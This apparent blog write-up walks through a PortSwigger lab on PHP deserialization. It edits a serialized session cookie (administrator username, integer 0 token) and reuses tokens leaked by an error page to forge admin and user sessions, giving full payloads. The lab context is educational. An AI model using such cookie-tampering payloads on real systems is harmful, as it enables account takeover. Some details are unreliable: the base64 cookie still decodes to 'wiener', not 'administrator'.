Lab: Modifying serialized data types | Portswigger

Web security academy

Lab description

This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.

Access the lab

  • Login with your credentials [ wiener : peter ]
  • In Burp, open the post-login GET /my-account request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.
  • Decode it as URL then as base64
deserialization format
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh";}
  • In Burp Repeater, use the Inspector panel to modify the session cookie as follows:
  • Update the length of the username attribute to 13.
  • Change the username to administrator.
  • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
  • Update the data type label for the access token by replacing s with i.
Modifying data types
  • Encode it as base64 first
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtpOjA7fQ==
  • Then encode it as url
%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67%36%49%6e%56%7a%5a%58%4a%75%59%57%31%6c%49%6a%74%7a%4f%6a%59%36%49%6e%64%70%5a%57%35%6c%63%69%49%37%63%7a%6f%78%4d%6a%6f%69%59%57%4e%6a%5a%58%4e%7a%58%33%52%76%61%32%56%75%49%6a%74%70%4f%6a%41%37%66%51%3d%3d
  • Copy this url encoding format and paste it in Cookie (inspector) and refresh the page
  • Wow , i got to access admin panel ans have the permission to delete any user.
access admin panel

Second method

While solving the lab , i made an error in session format it was an internal server error and the server leaked all tokens which stored in the system.

Internal server error
$access_tokens = [z95mls52t3l8efgp85tfl1aalg54hyg9, gjv08qeybgi7kisid7dsen67zsdj0vbc, f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh]
  • I tried this token : z95mls52t3l8efgp85tfl1aalg54hyg9
  • Then i changed the token value as the following format
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}
  • I changed token to the last one : gjv08qeybgi7kisid7dsen67zsdj0vbc
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"gjv08qeybgi7kisid7dsen67zsdj0vbc";}
admin panel
Solved
  • So, i changed the length of username character from 13 to 6
  • I changed the value of username from administrator to carlos as the following format
  • I changed the token with the last one.
O:4:"User":2:{s:8:"username";s:6:"carlos";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}
account takeover

--

--

Cyber security engineer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store